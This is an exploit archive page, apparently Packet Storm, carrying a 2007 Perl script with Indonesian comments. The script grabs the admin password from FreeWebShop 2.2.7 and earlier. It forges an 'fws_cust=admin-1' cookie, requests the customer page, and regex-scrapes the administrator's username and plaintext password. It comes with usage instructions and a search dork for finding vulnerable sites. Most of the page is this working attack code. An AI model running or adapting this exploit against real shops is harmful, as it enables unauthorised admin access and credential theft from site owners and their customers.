what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

freewebshop-passwd.txt

freewebshop-passwd.txt
Posted Dec 18, 2007
Authored by k1tk4t | Site newhack.org

FreeWebShop versions 2.2.7 and below remote admin password grabber exploit.

tags | exploit, remote
SHA-256 | d7d88ab38b5769de456c878d45893e4515fa013bdfcb5240adfbaf5ea40cf5aa
Download | Favorite | View

freewebshop-passwd.txt

Change Mirror Download
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# FreeWebshop <= 2.2.7 - (cookie) Admin Password Grabber Exploit
# Waktu      :  Dec 17 2007 04:50AM
# Software    :  FreeWebshop <= 2.2.7
# Vendor    :  http://www.freewebshop.org/
# Demo Site    :  http://www.freewebshop.org/demo/
# Ditemukan oleh  :  k1tk4t  |  http://newhack.org
# Lokasi    :  Indonesia
# Dork      :  "Powered by FreeWebshop"
#
# Terima Kasih untuk;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips
# nyubi,iFX,sin~X,kin9k0ng,bius,selikoer,aldy_BT
# Komunitas Security dan Hacker Indonesia
#
# ----------------------------[Cookie Injection]------------------------------------
use LWP::UserAgent;
use HTTP::Cookies;

if(!$ARGV[1])
{
 print "\n  |-------------------------------------------------|";
 print "\n  |         Indonesian Newhack Technology           |";
 print "\n  |-------------------------------------------------|";
 print "\n  |FreeWebshop 2.2.7 (cookie) Admin Password Grabber|";
 print "\n  |     Found by k1tk4t [k1tk4t(at)newhack.org]     |";
 print "\n  |-------------------------------------------------|";
 print "\n[!] ";
 print "\n[!] Penggunaan : perl freewebshop227.pl [URL] [Path] ";
 print "\n[!] Contoh     : perl freewebshop227.pl http://korban.site /WebShop/";
 print "\n[!] ";
 print "\n";
 exit;
}

my $site = $ARGV[0]; # Site Target
my $path = $ARGV[1]; # Path direktori envolution_1-0-1

my $www = new LWP::UserAgent;
#my @cookie = ('Cookie' => "cookie_info=admin-1"); #Untuk Versi < = 2.2.4
my @cookie = ('Cookie' => "fws_cust=admin-1"); #Untuk Versi > = 2.2.6
my $http = "$site/$path/index.php?page=customer&action=show";
print "\n\n [~] Sedang Mencari Username dan Password.... \n";
my $injek = $www -> get($http, @cookie);
my $jawaban = $injek -> content;
if( $jawaban =~ /login value='(.*)'/ ){ print "\n [+] Username: $1"; 
$jawaban =~ /"password" name="pass1" size="10" maxlength="10" value="(.*)"/ , print "\n [+] Password: $1 \n";} 
else {print "\n [-] Gagal :( , Coba yang lain!";}

# ----------------------------[Selesai]------------------------------------
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close